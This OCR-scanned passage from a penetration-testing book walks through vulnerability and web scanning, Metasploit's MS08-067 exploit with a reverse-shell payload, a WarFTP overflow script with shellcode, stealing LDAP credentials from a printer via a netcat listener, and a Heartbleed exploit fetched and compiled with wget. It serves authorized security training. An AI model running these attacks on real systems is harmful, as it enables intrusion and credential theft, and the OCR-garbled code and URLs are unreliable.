different configurations, do authenticated scans, create reports, and even distribute scans over 
multiple nodes. 


To get OpenVAS up and running, from a command prompt on your Kali host, type: 

• openvas-setup 

• openvas-scapdata-sync 

• openvas-certdata-sync 

• openvas-adduser 

• gsd 

Enter the server address as localhost and the username/password of the account you created during 
the setup phase. 
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OpenVAS 


Once you login, you can go right to starting a scan : 

• Tasks ->New 

• Click on the Blue Star on Scan Targets 

• Add your IP ranges and Create the Scan 
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It is pretty straightforward to start and kick off a vulnerability scan as your tasks should be pre¬ 
populated at the bottom pane of Greenbone Security Desktop. Once you see your task, you can right- 
click on that task and click “Start.” 

















































Greenbone Security Desktop 
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OpenVAS - Starting Scan 


Once the scan completes, you can go over to the report tab or export the report to a PDF format. 



OpenVAS - Results 


This vsftpd vulnerability was the one that we found on the Metasploitable 2 box, which we used to 
exploit with Metasploit in the prior section. 
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Sunnary: 

vsftpd is prone to a backdoor vulnerability. 

Attackers can exploit this issue to execute arbitrary commands In the 
context of the application. Successful attacks will cooproaise the 
affected application. 

The vsftpd 2.3.4 source package is affected. 

Solution: 

The repaired package can be dovnloaded froa 
https://security.app8pot.con/v8ftpd.htiLl. Please validate the package 
with its signature. 

OpenVAS - Findings 


Vulnerability scanning is still an important factor in any penetration test, though it definitely is not the 
be-all and end-all for offensive testing. If you look at real world examples, other than external 
scanning, most attacks do not incorporate a lot of internal scans. This is because they are loud, trigger 
intrusion detection systems, and, at times, take down services. Instead, they focus on moving quietly 
through the network, taking knowledge gained from each step to move laterally, and the importance of 
data exfiltration. 


Web Application Scanning 


Scanning the SUCK network, we should now have a good idea of what the infrastructure and running 
services look like. We have done our research on OSINT tools, created password lists, and we have 
run our vulnerability scanner. So what’s next? Since most companies these days actually do run 
vulnerability scanners across their networks, although I still do come across ms08-067, but it is 
becoming much less frequent. If you do come across an infrastructure that does patch generally well, 
then web application scanning on a network pentest can be extremely helpful. 


After I start the network scanners and get a layout with the active discovery tools, I begin my web 
application scanners. In web scanning, I am going to mainly focus on one tool. There are a lot of good 
open source/free tools available to use, such as ZAP, WebScarab, Nikto, w3af, etc. In this case, I am 
going for the quickest, most efficient way to perform a test. Although the Burp Suite Pro 
f http://portswiggcr.net/burp/) is a commercial tool, it only costs around $300. This is well worth the 
cost as it is actively maintained, has a lot of capabilities for manual testing, and many security 
researchers develop extensions for Burp. 

Similar to the discussion of vulnerability scanners, this isn't going to be a comprehensive guide to 
accomplishing web application penetration tests, but more of what is performed during a network 
penetration test. If you want to focus on testing a single application thoroughly, you are going to want 
to look into both source code analysis (using something like HP Fortify) and in-depth application 













testing (a great resource for this is a book called The Web Application Hacker's Handbook: Finding 
and Exploiting Security Flaws). Let's dive into how to efficiently use Burp Suite. 


The Process For Web Scanning 


In this section, I describe how I use Burp Suite Pro to scan web applications during a network 
penetration test. Usually, I won't have enough time during a network pen-test to do a full web 
application test, but these are the steps I take when I identify larger applications: 

• Spider/Discovery/Scanning with Burp Pro 

• Scanning with a web application scanner 

• Manual parameter injection 

• Session token analysis 


Web Application Scanning 


After running a tool like Nessus or Nexpose to find the common system/application/service 
vulnerabilities, it is time to dig into the application. I am going describe how to use Burp Suite and 
get you to start looking deeper into the application. The following steps will: 

1) Configure Your Network Proxy 

2) Enable Burp Suite 

3) Spider through the application 

4) Discover Content 

5) Run the Active Scanner 

6) Exploit 


Configuring Your Network Proxy and Browser 

Remember that the Burp Suite tool works by configuring your web browser to talk through the Burp 
Suite application and then to the web applications). This will give you full visibility in the requests 
made by the browser and also give you the ability to modify the raw requests regardless of client side 
protections. 


First, you are going to want to start Burp Suite by running the JAR file on either the Windows or Kali 
system. Once you have Burp up and running, you want to make sure your proxy is enabled and 
listening on port 8080. Go to the Proxy tab in Burp, then to Options, and make sure that Burp is 
running. It doesn't matter which interface port you use, however, if you change it from the default, 
make sure to change it in your browser's configuration. 
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Enabling Burp Suite 


Now, we need to configure your browser so that it can use the port on which we had Burp Proxy 
listening. The add-on that I use is called Foxy Proxy for Firefox: 

f https: //addons .mozilla.org/ en-US/firefox/ addon/ foxyproxv-standard/ ^ 


And it should have been installed in the setup phase. It provides an easy way to have multiple proxies 
and be able to change between them quickly Right next to the browser's URL bar, there is a fox with 
a circle and line across it. Click on the fox, click Add New Proxy, click the Proxy Details tab, and set 
























































the Manual Proxy Configuration to the local host (127.0.0.1) and the proxy port of 8080. Go back to 
the General tab, give that proxy a name, and save that configuration. 

What you have essentially done is told your browser to send all the traffic to your local host to port 
8080. This is the port on which we have configured the Burp Suite application to listen. Burp knows 
that it will take this traffic and proxy it out to the Internet. 
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Configuring the Browser’s Proxy Settings 


Since you have saved this profile, right-click on the fox and drop down to select your proxy 
configuration. In this case, I named my proxy configuration Burp Suite and selected that as my proxy. 




Buy TheHaekerPlaybook 



ISJ Use proxies based on their pre defined patterns and priorities 

inline ' / Ftesu 




_ Use proxy "Default' for all URLs 

J Completely disable FoxyProxy 


Options $F2 

QuickAdd \'F2 

Use Advanced Menus 
























































Selecting the Proxy to Utilize 


Once we have our browser using the proxy, we can browse to the web application we identified 
earlier. In this example, I am going to go to my site in my browser: www.securepla.net. If we go back 
to Burp, we are going to see the Proxy/Intercept tab light up. 



Burp Capture and Intercepting Traffic 


If we see this happen, we know we have configured everything perfectly. We see that Burp 
successfully captured the GET request for my website and we can also see any cookies and other 
requested information. By default, the initial state is to intercept all traffic. Intercept means to stop 
any requests from the browser to the web application, give you the ability to read or modify that 
request, and either forward that request to the web application or drop that request. 

If you try to browse to any sites with the default setting, you won't be able to see any responses until 
you turn off the "Intercept" button. By turning the "Intercept" button off, we will still be capturing all 
the web traffic, but we won't be directly tampering with every request. Once in an “Intercept-off’ 
state, you can see all the requests and responses within the History tab to the right of the Intercept. 


Now, if we go to the Target tab, we can see the URL that we had just trapped and forwarded. Let's 
first add this site to our Scope. Scope defines where automated spidering and testing could occur and 
helps prevent you from actively scanning domains that are out of your scope. We will go into this a 
little bit later, but you should add all the URLs or LQDNs you want to test to your scope. The image 
below shows the tester right-clicking on the domain and clicking on "Add to scope." 






























Burp Intruder Repeater Window Help 
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Creating Your Scope 


Spider Application 

The first thing to do for web application testing is to spider the host. This means that Burp will crawl 
through the whole website and record all the different files, forms, and HTTP methods on that site. 
We spider first because we need to identify where all the links are, what types of parameters are used 
in the application, what external sites the application references to, and the overall layout of how the 
application functions. 


To spider your application, drop into the Target tab, the Site map tab, right-click the domain on which 
you want to spider, and click "Spider this host." 



Spidering the Host 


Once the spidering process is complete, Burp should have a good layout of what the application looks 
like. We can also click on any file (image below) to see what the request and the response were. In 
the left-hand column, we see all of the files and folders, and on the right-hand side, we see the 
requests and responses. Right below the Site map tab is the Filter button. Try playing around with this 
to see what you are filtering out and what works for you. Generally, I like to first add all my domains 
to scope and then click the Filter to only show those that are in scope. It ends up cleaning up a lot of 
referenced domains, which are out of scope on my tests anyway. 
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Site Map/Request and Responses 


Discover Content 

There are times where pages or folders are not directly linked from a web application. For example, I 
have often seen that the admin folder or login page are not referenced anywhere on the site. You might 
see that when you go to the /admin/ folder in your browser bar, you are taken to the admin 
authentication page, but this might have been missed during the spidering phase. This is usually 
because host administrators are trying to hide these folders and administrative login pages from 
general users. These are the exact types of things you are looking for in a test, so that you can try to 
bypass or brute-force the authentication process. 


There is a specific module within Burp that is extremely helpful in these scenarios. Within the same 
Site map tab, you right-click on the parent URL, drop down to "Engagement tools," and click on 
"Discover content." 
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Discover Content 


Once inside the Discovery module, you can click on the "Session is not running" button and the 
application will start "smart brute forcing" folders and file structures. When I say, "smart brute 
forcing," I mean the application learns from files and folders it finds within the application and tries 
to make better choices for brute forcing. This technique provides an efficient process to identify 
folders and files to further your application testing. 


Before I show the example, note that there are custom wordlists that I prefer to use during my own 
assessments. One of these lists comes from a tool called RAFT that is no longer developed. 


These lists can be found here: http://code.google.eom/p/raft/source/browse/trunk/data/wordlists/? 
r=64 





























Discovering Session Status 


As you can see in the image above, the Discovery tool identified the /wp-includes/ folder which is 
common to WordPress applications. It then starts looking for common folder/files types within that 
folder. You can click on the Site map tab at the top of the Discovery module and see all the results 
from that scan. This will help to quickly identify hidden folders, admin pages, configuration pages, 
and other pages that will prove useful to a tester. 


Running the Active Scanner 

Once you feel comfortable that you have identified an adequate portion of the site, you can start 
attacking the parameters, requests, and start looking for vulnerabilities. This can be done by right- 
clicking on the parent domain and dropping down to "Actively scan this host" (image below). This 
will kick off Burp's application scanner and start fuzzing input parameters. Remember, this is going to 
be extremely loud on the network and may submit extensive queries in the application. A quick 
warning, if the application has a comment box, the customer might receive an excessive amount of 
emails from all the parameters being actively fuzzed. This is why it is always important to let your 
customer know when and from where the tester will be performing these tasks. 
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Active Vulnerability Scans 


Once the scanner is running, the results and testing queue will be located in the "Scanner" tab. You 
might want to look at the Options tab within the Scanner tab to further configure Burp Suite. One 
change that I generally make to decrease scan times is to increase the number of threads in the Active 
Scan Engine section. This will make a significant difference in the amount of time that is required, but 
be careful, as you might take down a small site if the thread count is too high. 


If we take a look at the results, we see that Burp Suite found an XSS vulnerability for this website. 
Burp told us exactly what the issue was, the request to repeat it, and the response. 
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Scan Results 


Being a penetration tester, you need to verify that you do not have any false positives and identify the 
actual severity of the finding. Let's see if what Burp had found was actually valid. Clicking on one of 
the XSS vulnerabilities, we can see the exact GET parameter that was used. To replicate this issue, 
we would have to go and visit: 

www.securepla.net/xss_example/example.php?alert=9228a<script>alertf 1 )</ script>281717daa8d . 


Opening a browser and entering the URL, the following demonstrates that this is not a false positive, 
but a real vulnerability. If you aren't familiar with XSS attacks, I would spend some time playing with 
a vulnerable web application framework like WebGoat: 

https://www.owasp.Org/index.php/Category:QWASP_WebGoat_Project . 
















































Burp will do a lot more than just check for XSS vulnerabilities. It can identify CSRF issues, bad SSL 
certs, directory traversal vulnerabilities, SQL injections, command injections, and much more. To see 
more uses of Burp, go to the section in this book about The Throw - Web Application Pen testing. 


OWASP Zap Proxy 

f https://eodc.google.eom/p/zaproxv/ ff Kali Linux/Windows/OS X) 

The equivalent to Burp Pro Proxy on the open source side is called OWASP Zed Attack Proxy or 
ZAP. Although Burp is a commercial tool, ZAP has many of the same features. Fromproxying traffic, 
fuzzing requests, spidering and automated scanning, ZAP does it all. In Windows/OS X, you can just 
double-click on the OWASP ZAP executable and you can run it on Kali with owasp-zap. 


We are going to test against one of the vulnerable frameworks on OWASPBWA (which we installed 
in the setup phase of the book). In this case we will be testing against the owaspbricks application. 
Once you start up ZAP, you will be presented with the image below. The straightforward attack is to 
just put in the URLhttp://[IP of VM]/owaspbricks/ and hit Attack. ZAP will automatically run through 
the spidering and testing for web vulnerabilities. 













ft ^ ~ 

ftifltirtiroft : : 

■ ilff-s 


d Sc. - non ■ O -V^^ ?-■'!"' 


i J 
I ; Cl I , 


^Fipti 


IP B i ■+ *- i* ► C 1 x1111 1 fc ■ 

OijuicV ^r.^n -:■• . : , *e<*iw Bf«k SerlptCan 



Welcome to the OWASP Zed Attack Proxy (ZAP) 

JAPis in ■•.ViY lo u^c ntegrand penetration rescitii) i-nol tor finding vulincMbilitiei in vwh applicationt 
Pl»j( fa ww that yw jhc.iAJc#v Hut* applKfliqns Wit you fa* fat* ipKlfiC^lly hfli gl*n pint*' 
TMufckly l«t IB tppHtitkr^ mv Itl URL MOW l*& Jrtii'Allirt'. 


U£L to all Mk 


frpptM: 


htp ://1 Ti. It. IS 1 . Ifa/iro aipbrickij 

Spiffing [fa IJHI to dl«o*r [fa rorciffli 


For a tngre in depth r«i vmj ihou'rl exploftyijur .ixsplicxii-nn Litinq yttur tiron^er or a aroma re if imwimi 


/ Fwced Hroxw M Fu uti Faramj 


£ Hljtoey x S-N/eh X freak flolnrs [Bl Alerts & Arrive Scan • Spider 

! 171 II i | 


i,le I?2.]6.1il.m:i6 

Pritm^ 




Current 5 ghi:Q | URls ^aunc 



UFihijd 

oil 

Htfi? 

# 

err 

mMin.u.1 h .nirimaipfenckv 

SEED 

« 

err 

■ :lp j i 1 H.ie.Ul .14 4 ,'i. jipfcrK 1 1 nrfr 


§ 

«i 

*vflp JJ1R.3A.U1 


# 

err 

'■■tip.' i'17Z.lfi.lJ1.] < 1,‘e-jiot^pages.hinti 


• 

err 

up.'tl71.lfi.lSI.1 “j — T »-—f upfrd -jjgM hr*. 



OWASP ZAP 


As you can see, everything is pretty straightforward. Once the scan is finished, click on the Alerts tab 
to see all the vulnerabilities that are identified. 
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OWASP ZAP - Results 


Scanning with multiple web applications scanners is just as important as scanning with both Nessus 
and Nexpose for network-based vulnerabilities. Here is a side-by-side comparison of scanning the 
same application. As we can see, we have found completely different vulnerabilities, vulnerability 
locations, and different types of findings between ZAP on the left and Burp on the right. We can 
instantly identify that our scanners have much different results. 
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The one question that I often get is: Which is better?” The answer is that it always depends. The best 
answer would be to use both. They both do a lot of the same things, but have benefits in their specific 
areas. The security community does lean more on the Burp Proxy Pro because it supports Burp 
Extender ( http://portswigger.net/burp/extender/ ^ . which you can use to create customized scan tools. 
You might have an application that does some processing of cookies or that requires a multi-step 
processes before fuzzing a certain parameter. This is where Burp has exceeded well and you can read 
more about this here: 

http://blog.opensecurityresearch.com/2014/03/extending-burp.html . 


Parsing Nessus, Nmap, Burp 


One of the biggest problems for any tester is that the outputs from many of the different tools can make 
them hard to use. Lee Baird has included a great parsing tool in his Discover toolset. It standardizes 
all the ports, services, findings, and associated information into an easily usable CSV format. 


• cd /opt/discover 

• ./discover.sh 

o 12. Parse XML 
o 2. Nessus (.nessus format) 
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Parse XML to CSV for use with /discover/misc/worksheet.xlsx. 
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Discover Parsing 


The output saves to a csv file under /home/data. The image below shows both a Nessus and Nmap 
output. This makes it much easier to quickly identify systems, services, and vulnerabilities. 
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Burp takes a couple more steps. On the Scanner/Results Tab, right-click on the URL you scanned and 
click “Report Selected Issues.” You will be prompted with a reporting wizard and select XML and 
deselect Base64-encoded requests/responses. 


f Results Scan queue ] Live scanning | Options | 

44 http://172.16.151.144 


► 44 SQL injection (3] 

► owaspbricks 


4# Cross-site scripting (reflected) [3] 

► 44 Cleartext submission of password [6] 



► ! Serialized object in HTTP message (10) 

► 44 Password field with autocomplete enabled 

► i Cross-domain Referer leakage 12] 


«00 

Burp Scanner reporting wiz; 


I 7 ] Choose the format for the report. 

LiJ 

O HTML 
(•) XML 

O Base64-encode requests and responses 


Discover Burp Logs 


And the output is a well-formatted CSV file with all your findings! This can make it quick for 
reporting, and quickly identifies what you are going to attack next. 
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Summary 


Scanning the network is an important step for a successful network-wide penetration test. With such a 
large scope, both passive and active scanning can provide information about the network, services, 

























applications, vulnerabilities, and hosts. Using specialized or customized port scans, web scraping, 
"smart brute forcing," and automated tools can help you increase the efficiency and the effectiveness 
of the test. These findings will directly lead into the next few sections on exploiting vulnerabilities 
identified by this process. 



The Drive - Exploiting Scanner Findings 


You were able to successfully complete your last mission of OSINT and scanning without being 
caught. The next phase of your mission is to take everything that you have gathered and learned to 
identify weaknesses and exploit them for fun and profit. 


As with the first THP book, The Drive section takes results from the prior phases and exploits them 
for an initial foothold into the company. Some findings might have exploits available through the 
Metasploit framework, some you might have to find on exploit forums, and some just take experience 
and knowledge to take advantage of misconfigurations. 


Using you use Nexpose or Nessus (or any other vulnerability scanner), might not make a difference 
for the exploiting process. Once a scanner finds a vulnerability, I will usually go and search for a 
working exploit. I have dedicated a section in the later chapters about Vulnerability Searching and 
how to find exploits based on findings from a scanner, but for now, I will briefly describe how to use 
Metasploit, the importance of understanding scripts to exploit your vulnerabilities, and common 
vulnerability misconfigurations. 


Metasploit 

f http://www.metasploit.com f (Windows/Kali Linux) 


Before we can get into exploiting scanner findings, we need to quickly go over Metasploit again. The 
Metasploit Framework is designed for developing, exploiting, and assisting in attacks. The best part 
of the framework is that it was developed with research in mind. By this, I mean that it is very easy to 
develop your own Metasploit modules and utilize them within the framework. It doesn’t take a lot of 
Ruby knowledge, but it requires only basic scripting skills. Without spending too much time 
explaining Metasploit, let’s walk through an example using the framework. Remember that this book 
is geared to those that have some Metasploit experience. If you are pretty new to Metasploit, you 
should spend a fair chunk of time learning the basics of this tool. 


Here are a few helpful tips before we start with Metasploit. You should refer back to these tips while 
you are using Metasploit during your first few times; after that you should be good on your own. 


From A Terminal In Kali - Initialize And Start Metasploit: 


• Start PostgreSQL 

o service postgresql start 

• Start PostegreSQL on Bootup 

o update-rc.d postgresql enable 



• Start and stop the Metasploit service (this will setup your database.yml file for you) 

o service metasploit start 
o msfconsole 
o exit 

o service metasploit stop 

• Log everything to /root/msfconsole.log at a command prompt: 

o echo "spool /root/msf^console.log" > /root/.msf4/msfconsole.rc 

• Start Metasploit Command Line 

o Msfconsole 


Running Metasploit - Common Configuration Commands: 


• help: Use help as much as you can! 

• search [string]: Search for vulnerability by CVE, title, application, etc. 

• use [module]: select module 

• info: get information once a module is selected 

• show options: show the requirements for the module 

• set and setg: Set the variables from show options. You can use setg for Global 
Variables. If you are jumping between modules and exploits and you don’t want to 
type in the IP address (or other input) every time, use setg instead of set 

• If you are using a remote exploit, you might not see the PAYLOAD as a choice 
inside show options, but you can always set it with: set PAYLOAD [hit tab a couple 
times to see the choices] 

• To set custom payloads: set EXE:: Custom [file] 

• exploit -j: active module to the background any connections to the listening handler 


Running Metasploit - Post Exploitation And Other 


• sessions -K: Kill all sessions 

• background: From a Meterpreter shell, go back into the main menu, but keep your 
current session established in the background 

• Resource file scripts to automate your handler (more info at the tips and tricks 
section of the book): msfconsole -r resource.re 

• http: / / www. cheatography.com/hunterei ght/ cheat- sheets/metasploit-4- 5 -O-de v- 

15713/ 

• http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commands 

The best method is to learn through example. I know that the MS08-067 vulnerability is pretty old, but 
I still find these vulnerabilities every so often and the attack is extremely stable compared to other 
remote attacks. For those who have never used or exploited the MS08-067 vulnerability, I 
recommend setting up a lab with an old unpatched Windows XP system and trying this exact example. 





If you are an expert MS08-067'er, you can skip this short section. 


Using Metasploit For MS08-067: 


• Dropping into Metasploit on Kali: 

o Open up a terminal and type: msfconsole 

• To search for a vulnerability, type: 

o search ms08-067 

• Select the exploit from the search results, type: 

o use exploit/windows/smb/ms08_067_netapi 

• See options required for the exploit to work, type: 

o show options 

• Set IP information, type: 

o set RHOST [IP of vulnerable Windows host] 
o set LHOST [IP of your machine] 

• Select which payloads (to get a better understanding of the types of payloads 

review: http://www.offensive-security.com/metasploit-unleashed/Payload_Types) 

and encoder to use, type: 

o set PAYLOAD windows/meterpreter/reversetcp 
o set ENCODER x86/shikata_ga_nai 

• Run the attack, type: 

o exploit 


msf exploit( 

) 

> show options 1 

Module options (exploit/windows/smb/msO8_067_netapi): 

Name 

Current Setting 

Required 

Description 

RHOST 

192.168.1.10 

yes 

The target address 

RPORT 

445 

yes 

Set the SMB service port 

SMBPIPE 

BROWSER 

yes 

The pipe name to use (BROWSER, SRVSVC) 

Payload options (wlndows/meterpreter/reverse_tcp): 

Name 

Current Setting 

Required 

Desc rlptlon 

EXITFUNC 

thread 

yes 

Exit technique: seh, thread, process, none 

LHOST 

192.168.1.2 

yes 

The listen address 

LPORT 

4444 

yes 

The listen port 

Exploit target: 



Id Name 




0 Automatic Targeting 




Metasploit 


These are the basics of Metasploit and we will build off these really quickly. Make sure you spend 
time exploiting Windows and Linux machines before trying any attacks in the wild. 


Scripts 








There were countless times where I found exploits for vulnerabilities that were not in Metasploit. 
Usually, when searching for vulnerabilities based on version numbers from the banner-grabbing 
script, I will find exploits in other places (see Special Teams - Cracking Exploits and Tricks 
section). A lot of the time, the scripts/codes will be written in Python, C++, Ruby, Perl, Bash, or 
some other type of scripting language. 


Note that as a penetration tester, you need to be familiar with how to edit, modify, execute, and 
understand the scripts/codes regardless of the language and be able to understand why an exploit 
works. I don't recommend you ever execute a script without testing it first. I have honestly seen a few 
scripts on forums and Exploit-DB where the shellcode payload actually causes harm to the intended 
system. After the script exploits the vulnerability, the payload deletes everything on the vulnerable 
host. I am pretty sure that your client would not be too happy if everything on his host system was 
wiped clean. This is why you should always either use your own shellcode or validate the shellcode 
that is within the script. 


WarFTP Example 


Let's say you find a vulnerable version of WarFTP server running and you find some code (for 
example: http://downloads.securityfocus.com/vulnerabilities/exploits/22944.py) on the Internet. 
Things you may need to understand: 

• How do you run the exploit? What language is it? Do you need to compile it or are 
there any libraries you need to import? 

• Are there any dependencies required for the exploit to work? Version of Windows 
or Linux? DEP or ASLR? 

• Are the EIP addresses or any other registers or padding values hardcoded to 
specific versions? Do they need to be modified? 

• Will the exploit take down the service? Do you only have one chance at 
compromising the host? This is very important as you might need to work with the 
client or test a similar infrastructure environment. 


Here is an example of what your script could look like and, if run properly, could allow shell access 
on the victim server. 



SFIpEpEIlF 


#‘/uar/biWpycfc9itf 

import 03 
import sya 
import Struct 

sys.stdouc - cs,idDptu(sss.*t<tout.filffB 0 O f 'u 1 , 0) 
flip = Ox^cf3si 

sheLlcodft ■ n \ xeb\x03\x59\xeb\xQ5\ J«eS\xfa\Kf£\Xtf\x££\X49\X49\X49\ «49\ *49^ M 
Shtlicodfl +■ K4^\ X43\3C4S\3t49\3C49\ 3£49\ X49\ M49\ X51\ X5A> X6a\ 

sheiieode +■ **\ xSS\ x 30 \ x 42 \ x 3 l\ x 50 \ x 42 \x 4 l\ x£b\ %il\ x 4 l\ x 52 \ x 32 \ x 42 \ x 42 \ x 42 \ 
shelkode +- 1 , \x 4 i\x 4 l\x 30 \x 4 l\x 4 l\x 5 S\x 33 \x 4 £\x 42 \x 50 \x 75 \x^x 49 ^ 6 bV): 4 c\ 
she Ucede +- if \ x 5 a\x 5 &\x 4 b\x 32 \ xx 6 d\x 33 \x 4 S\x 79 \x 4 b\ x 4 f\X 4 b\ x 4 f\X 4 b\ x 4 l\ 


shflLicCde 
sheiltode 
ahellcode 
shelicode 
sheLlccde 
shfillcodt 


+- l '\x7l\x62\x4ft\x4S\x51\xSO\xSl\x43WSl\x30\xSS\x46U31\x4bU4^ 
t- w \x5D\x6l\x?&\x6e\x4d\x6b\x&9\x74\K4S\x53\x4e\x6lU43^x4bUW 
+* x56\ x33\ x5a\ x4b\ x4f \ x69\ x6f^ x66\x57\x39^ xfif\x6a\x70\x4c\x4l)\ 
+- ,f \x37\xeij\x4c\K^\x53\xfll\x34\x73\x54\x49\x^x7e\x56\x30\x52\ 
+» ^zfifU7a\x70^xl55\x3B\x7a\x5D\x6i\x7a\x77\x74\3(51'u*f\x66\x33\ 
t- "\x4f'iX4cVx36\x79Vx6f\x5a\x70\x42 w 


prepend = w Vx8LYxC4\xFF\xEr\xrr\xrP fl add esp, -lOOlh 
prepend +■ # inc esp 

bUf ■ "USER, " 

feyf +■ "A" * 43 S + struct,paekt'<! , eip) +■ w \x 90 * * 1 + prepend + shallccd* 
buf +- "H" 

s ys. s tdo ut. v r 1 1 e ^ b uf t 


Example Exploit 






Even with MS08-067, the exploit is Operating System and service pack dependent. Luckily with that 
payload, it tries to identify the proper OS before exploiting the host. A lot of the exploits that are 
written in scripting languages do not take these into account and are developed for a single OS type. 
This is why you will often see that the exploit will contain information about the system on which it 
was tested. Even within the same Operating System, something like the Language of the OS can cause 
an exploit to fail or cause a denial of service. For example, the following PCMAN FTP buffer 
overflow exploit was only tested on the French version of Windows 7 SP1. This does not guarantee 
that this exploit will be successful on the English version. 

I ^ ) > | | ^ | [ % j | www.explolt-db.com/explolts/27277/_ 

<s> Disable » X Cookies • /• CSS » M Forms * E Images * { Information » M 


PCMAN FTP 2.07 PASS Command - Buffer Overflow 


Rating 

Overall: 


Previous Exploit 


Home 


Next Exploit 


EDB-ID: 27277 CVE: N/A OSVDB-ID: 94624 

Author: Ottomatik Published: 2013-08-02 Verified: 

Exploit Code: Vulnerable App: 


#1/usr/bin/python2.7 
# coding: utf-8 -*- 


PCMAN FTPD 2.07 PASS Coranand Buffer Overflow 
Author: Ottomatik 
Date: 2013-07-31 
Software s PCMAN FTPD 

Verainn : 2.07 _ 

Tested On: Windows 7 SP1 - French; 

De ee gi p ti e n i 

* The PASS Command is vulnerable to a buffer overflow; 

* Other commads may be vulnerable; 

R II R 


FTP Exploit Example Script 


This is why I recommend you understand and test all of your exploits before you try them on any 
production host and make modifications to scripts as necessary. 


Printers 


It often happens that we overlook low-level findings, but there are many times where we can go from 
low to owning the network. One of my favorite examples is with printers. We all come across a ton of 














multi-function printers (MFP) on our engagements and, in the past, have overlooked them. What if 
these MFP devices could lead to a compromise on the network? 

You jump on a network and currently don’t have any credentials. You might want to start small and 
scan only your current subnet in hopes as not to alert any IDS sensors. In doing so, you come across a 
multi-function printer. 


Maybe your scanner picks up default credentials or you guess the password from reading 
documentation. {5} Moreover, perhaps you come across an unpatched printer and use an exploit in 
your printer exploitation folder-check out the /opt/praedasploit 
f https://github.com/MooscDojo/pracdasploit l folder. Once in the administrative console, you poke 
around and nothing really of value is there, or is there? You notice that these enterprise multi-function 
printers have the capability to query the domain to find email addresses via LDAP. This means when 
you are physically on the printer using the little LCD screen, when scanning a document, you have to 
internally find the sender’s email address based on their name. What if you could pull the password 
from the user account that it used to bind to the LDAP server to run the queries? {6} 

We first log into our Xerox MFP with the default credentials over HTTP. Like I said before, I am 
sure we see this pretty much on every penetration test. 
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Status 
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xerox 



Slotin: Alert: Paper Tray Empty 
Name: xerox 
Location: Copy 

Machine Model: Xerox CoiorQube 8 9 OCX 

Serial Number: 


Default Multifunction Printer 


A quick Google search (or maybe your scanner identifies the default password) and you know that the 
admin password is 1111. Going to the “Properties” tab, we can see that this printer is configured with 
LDAP to query the domain. 



















Centre ware 

Internet Services 


Properties 


Configuration Overview 
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►Services 
►Security 
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^ Enabled 

/ Edit... 


Protocol 

Statu* 

[ Action 


AppleTalk 
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Multifunction Printer - LDAP setting 


Looking at the configuration, we need to modify the LDAP server so that it points to our Kali attack 
VM. This way, any LDAP lookups will be directed to our LDAP server instead of the corporate 
LDAP server. 


We see in the username, that it currently uses a domain account and although the password field is 
blank, we can still make changes without re-entering the password information. We go ahead and 
save our configuration changes. 
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Multifunction Printer - LDAP Modification 


Now, we just need to wait until the MFP creates an LDAP lookup and we should be able to capture 
the credentials. Luckily, in the case of Xerox (and many other printers), they have a feature to test 
your LDAP queries. 


We can click the "User Mappings” tab and test a user lookup. 
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MFP - LDAP Check 


Remember that we are now pointing the LDAP server to our Kali Linux box. Before testing an 



























































account, we need to set up a netcat listener on the specified server we set in the configuration page 
above. We start a quick listener on port 444 (or whatever port you configured) and go back into the 
management console, and hit the “search user” button. 

root@kaMi " 

File Edit View Search Terminal Help 


rootiijka i ' nc -1 -vv -p 444 
listening on [any] 444 

inverse host lookup failed: Unknown server error : Com 
out 

connect 

QtCUP: ke r . testl ab\Domain_Admin_Accounts $upe r$ec retPass! ' 
( rcvd 84 


MFP - Capturing LDAP Credentials 


Looking at our netcat output, we now see that the MFP, which is connected to our Kali netcat listener 
via LDAP, tried to authenticate using a Domain Admin Account and a password of 
“$uper$ecretPass!”. 

In most cases, you might not come across a domain admin account, but you will have your first 
account to move laterally through the network. 


Heartbleed 


Heartbleed is one of those buzzword security vulnerabilities that blew up in 2014. Unfortunately for 
network administrators and system owners, this vulnerability was one of the worst issues of that year. 
The Heartbleed bug was a vulnerability in OpenS SL that allowed an attacker to read parts of the 
server’s memory. So what does this really mean? You can ask a server that uses SSL security for 
encryption to perform a request and, in addition, give you some allocated chunk of memory back. For 
an easier visual reference, visit this xkcd article: http://xkcd.com/1354/ . From the xkcd comic strip, 
you ask for a word to be returned (example: dog), but ask for the size to be returned as 500 bytes 
instead of the normal 3 bytes. The server will return the word “dog” back to you, and in the process, 
you will also receive any other memory that might have been allocated in previous requests. 


We don’t know exactly how many systems were vulnerable, but zmap.io did a scan of the Alexa Top 
1 Million domains as of April 16, 2014 and reported which domains were vulnerable at the time. 
Supposedly, reports have stated that even today some of the domains are vulnerable. See 

https: // zmap. io/heartbleed/ vulnerable .html . 






The scary part was what was found in the memory space. From numerous penetration tests, we found 
passwords, usernames, random strings, emails, session keys, and even private SSL certificates. With 
private SSL certificates, we can now decrypt any traffic that we sniff. 


So let’s walk through one example. Although there are numerous tools (a Metasploit module is 
available) to pull memory from vulnerable OpenSSL services, we are going to compile our own: 


• cd /opt/ 

• wget 
https://raw.githubusercontent.eom/HackerFantastic/Publie/master/exploits/heartbleed.c 

• gee heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lerypto 

• chmod +x heartbleed 


We should have a heartbleed binary to execute against a vulnerable service. The most common way 
to exploit heartbleed was via HTTPS, but it is not the only way. One more interesting example that I 
have seen in multiple environments is from OpenLDAP using OpenSSL. We all know that LDAP is 
the authentication and authorization source for many different companies and being able to pull out 
sensitive data could be detrimental. 


From our vulnerability scanner output, we see that 192.168.100.101 is vulnerable to Heartbleed. 
Let’s take the binary we just compiled and execute it against that host: 

• ./heartbleed -s [IP] -p [port] -f [output file] -v [verbose] -t [type] 

• example below: ./heartbleed -s 192.168.100.101 -p 636 -f outputldap -v -t 1 


i i :/opt# ./heartbleed -s 192.168.100.101 -p 636 -f output Idap -v -t 1 
[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit 

t 

[ connecting to 192.168.100.101 636/tcp 
[ connected to 192.168.100.101 636/tcp 
[ <3 <3 <3 heart bleed <3 <3 <3 
[ heartbeat returned type=24 length=16416 
[ decrypting SSL packet 
[ heartbleed leaked length=65535 
02 FF FF AF 8F DC BE 13 15 80 4D E8 8A D3 27 2C 

78 88 CF C2 3B 40 7C 08 08 08 08 08 08 08 08 08 

02 FF FF AF 8F DC BE 13 15 80 4D E8 8A D3 27 2C 

78 88 CF C2 3B 40 7C 08 08 08 08 08 08 08 08 08 

[ final record type=24, length=16384 
[ wrote 16384 bytes of heap to file 'output_ldap' 

[ heartbeat returned type=24 length=16416_ 


